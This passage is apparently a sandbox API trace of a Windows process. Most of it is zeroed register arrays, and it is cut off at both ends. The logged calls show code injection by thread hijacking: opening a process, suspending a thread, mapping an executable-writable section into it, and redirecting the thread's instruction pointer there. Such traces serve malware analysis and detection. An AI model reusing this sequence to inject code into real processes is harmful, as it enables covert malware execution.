[107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0169.083] NtResumeThread (in: ThreadHandle=0x138, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0169.084] NtClose (Handle=0xb4) returned 0x0 [0169.084] NtClose (Handle=0x138) returned 0x0 [0169.085] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0xa10, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0x138) returned 0x0 [0169.085] NtQueryInformationProcess (in: ProcessHandle=0x138, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0169.085] NtQueryInformationProcess (in: ProcessHandle=0x138, ProcessInformationClass=0x0, ProcessInformation=0xde6e4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0xde6e4, ReturnLength=0x0) returned 0x0 [0169.085] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x397000, Buffer=0xde9f8, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0xde9f8*, NumberOfBytesRead=0x0) returned 0x0 [0169.085] NtDelayExecution (Alertable=0, Interval=0xde6cc*=-50000000) returned 0x0 [0169.093] NtOpenThread (in: ThreadHandle=0xdea64, DesiredAccess=0x1a, ObjectAttributes=0xde6b0, ClientId=0xde6c8*(UniqueProcess=0x0, UniqueThread=0xeec) | out: ThreadHandle=0xdea64*=0xb4) returned 0x0 [0169.093] NtSuspendThread (in: ThreadHandle=0xb4, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0169.093] NtMapViewOfSection (in: SectionHandle=0xc4, ProcessHandle=0x138, BaseAddress=0xde704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xde704*=0x21c0000, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000) returned 0x0 [0169.103] NtGetContextThread (in: ThreadHandle=0xb4, Context=0xde72c | out: Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x397000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x7567895c, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0169.105] NtCreateSection (in: SectionHandle=0xde6ec, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde6ac, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xde6ec*=0x140) returned 0x0 [0169.105] NtMapViewOfSection (in: SectionHandle=0x140, ProcessHandle=0xffffffff, BaseAddress=0xde6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6ac*=0xe7200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f4*=0x7300000, SectionOffset=0x0, ViewSize=0xde6ac*=0xe8000) returned 0x0 [0169.114] NtMapViewOfSection (in: SectionHandle=0x140, ProcessHandle=0x138, BaseAddress=0xde6f0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6e8*=0xe7200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f0*=0x6c0000, SectionOffset=0x0, ViewSize=0xde6e8*=0xe8000) returned 0x0 [0169.234] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x7300000) returned 0x0 [0169.240] NtClose (Handle=0x140) returned 0x0 [0169.240] NtSetContextThread (ThreadHandle=0xb4, Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x397000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x714707, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, 